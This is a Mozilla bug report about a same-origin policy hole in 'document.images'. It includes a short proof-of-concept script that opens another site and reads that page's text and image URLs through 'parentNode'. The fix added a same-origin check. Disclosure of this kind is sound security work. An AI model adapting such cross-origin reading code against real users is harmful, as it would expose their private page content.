Closed
Bug 17537
Opened 25 years ago
Closed 25 years ago
document.images vulnerabilities
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
document.images is not protected by "Same origin" security policy, which leads
to the following vulnerabilities:
1) Exposing the DOM of arbitrary documents (by using "parentNode") - at least
reading arbitrary documents
2) Browsing the images of arbitrary documents.
The code is:
----------------------------------------------------------
function f(o)
{
var s='';
var i;
s = o.nodeValue;
if ( o.childNodes )
for ( i = 0; i < o.childNodes.length; i++ )
s += f(o.childNodes[i]);
return s;
}
function f2()
{
alert("The text
is:\n"+f(a.document.images[0].parentNode.parentNode.parentNode.parentNode.parent
Node));
alert("The first image is: '"+a.document.images[0].src+"'");
}
a=window.open("http://www.yahoo.com");
setTimeout("f2()",10000);
----------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M14
Assignee | ||
Comment 1•25 years ago
|
||
Made "parentNode" subject to a same-origin test.
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
Comment hidden (collapsed) |
You need to log in
before you can comment on or make changes to this bug.
Description
•